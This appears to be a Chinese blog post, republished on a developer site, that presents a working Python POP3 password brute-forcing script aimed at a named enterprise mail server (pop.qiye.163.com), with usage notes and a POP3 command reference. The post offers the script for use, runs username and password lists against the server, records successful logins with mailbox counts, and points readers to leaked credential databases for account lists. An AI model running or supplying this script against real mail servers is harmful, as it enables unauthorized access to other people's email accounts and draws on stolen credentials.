按照师傅给的任务,写了一个企业邮箱的爆破脚本,后续还有FTP,SSH等一些爆破的脚本。
我先说下整体思路:
总体就是利用python的poplib模块来从pop3服务器上交互,根据获取的相关信息,产生结果。POP3协议并不复杂,它也是采用的一问一答式的方式,你向服务器发送一个命令,服务器必然会回复一个信息.
1.首先验证参数是否正确
sys.argv[]是用来获取命令行参数的,sys.argv[0]表示代码本身文件路径,所以参数从1开始
2.然后从用户密码文件中读取信息
3.pop.getwelcome()用来获取连接服务器的响应状态
4.然后就是脚本的核心代码部分
server = "pop.qiye.163.com" //设置pop3服务器地址pop = poplib.POP3(server,110) //连接pop3服务器pop.user(user) //验证用户名auth = pop.pass_(passwd) //验证密码if auth.split(' ')[0]== "+OK": //判断响应的结果是否“OK” pring user,passwd
5.最后输出出来相关的用户信息
脚本代码如下:
#!/usr/bin/python# -*- Coding: UTF-8 -*-'''@Author:joy_nick@博客:http://byd.dropsec.xyz/@Email Pop3 Brute Forcer'''import threading,time,random,sys,poplibfrom copy import copyif len(sys.argv) !=3: print "\t --------------------------------------------------\n" print "\t Usage: ./Emailpopbrute.py <userList> <passList>\n" sys.exit(1)server = "pop.qiye.163.com"success = []try: users = open(sys.argv[1],"r").readlines()except(IOError): print "[-] Error: urerList打开失败!\n" sys.exit(1)try: words = open(sys.argv[2],"r").readlines()except(IOError): print "[-] Error: passList打开失败!\n" sys.exit(1)try: pop = poplib.POP3(server,110) welcome = pop.getwelcome() print welcome pop.quit()except (poplib.error_proto): welcome = "No Response" passdef mailbruteforce(Listuser,Listpwd): if len(Listuser) < 1 or len(Listpwd) < 1 : print "An error occurred: No user or pass List" return 1 for user in Listuser: for value in Listpwd : user = user.replace("\n","") value = value.replace("\n","") try: print "-"*12 print "[+] User:",user,"Password:",value time.sleep(1) pop = poplib.POP3(server,110) pop.user(user) auth = pop.pass_(value) print auth if auth.split(' ')[0]!= "+OK" : pop.quit() print "unkNown error !" continue if pop.stat()[1] is None or pop.stat()[1] < 1 : pop.quit() print "获取信息失败!" continue ret = (user,value,pop.stat()[0],pop.stat()[1]) success.append(ret) pop.quit() break except: #print "An error occurred:",msg passprint "\t --------------------------------------------------\n"print "[+] Server:",serverprint "[+] Port: 995"print "[+] Users Loaded:",len(users)print "[+] Words Loaded:",len(words)print "[+] Server response:",welcome,"\n"mailbruteforce(users,words)print "\t[+] have weakpass :\t",len(success)if len(success) >=1: for ret in success: print "\n\n[+] Login successful:",ret[0],ret[1] print "\t[+] Mail:",ret[2],"emails" print "\t[+] Size:",ret[3],"bytes\n"print "\n[-] Done"
测试结果:
说明:
用户字典文件需要@domain.com,类似zhangsan@domain.com、lisi@domain.com、wangwu@domain.com这样的。由于我也没有企业邮箱的账号密码,也就没测试成功的,要是感兴趣,可以搜一下相关社工裤。
附:
python 中 os._exit(), sys.exit(), exit() 的区别是什么?
sys.exit(n) 退出程序引发一个SystemExit异常,可以捕获异常执行些清理工作. n默认值为0,表示正常退出. 其他都是非正常退出. 没有捕获这个异常,会直接退出;捕获这个异常可以做一些额外的清理工作。 一般主程序中使用此退出 os._exit(n),直接退出 Python 解释器,其后的代码都不执行,不抛异常,不执行相关清理工作. 常用在子进程的退出. exit() 跟 C 语言等其他语言的 exit() 应该是一样的pop3收取邮件的过程一般是:
连接pop3服务器 (poplib.POP3.__init__) 发送用户名和密码进行验证 (poplib.POP3.user poplib.POP3.pass_) 获取邮箱中信件信息 (poplib.POP3.stat) 收取邮件 (poplib.POP3.retr) 删除邮件 (poplib.POP3.dele) 退出 (poplib.POP3.quit)命令 poplib方法 参数 状态 描述
-----------------------------------------------------------------------------------------------
USER user username 认可 用户名,此命令与下面的pass命令若成功,将导致状态转换
PASS pass_ password 认可 用户密码
APOP apop name,Digest 认可 Digest是MD5消息摘要
-----------------------------------------------------------------------------------------------
STAT stat None 处理 请求服务器发回关于邮箱的统计资料,如邮件总数和总字节数
UIDL uIDl [Msg#] 处理 返回邮件的唯一标识符,POP3会话的每个标识符都将是唯一的
List List [Msg#] 处理 返回邮件数量和每个邮件的大小
RETR retr [Msg#] 处理 返回由参数标识的邮件的全部文本
DELE dele [Msg#] 处理 服务器将由参数标识的邮件标记为删除,由quit命令执行
RSET rset None 处理 服务器将重置所有标记为删除的邮件,用于撤消DELE命令
top top [Msg#] 处理 服务器将返回由参数标识的邮件前n行内容,n必须是正整数
NOOP noop None 处理 服务器返回一个肯定的响应
以上是内存溢出为你收集整理的python制作企业邮箱的爆破脚本全部内容,希望文章能够帮你解决python制作企业邮箱的爆破脚本所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)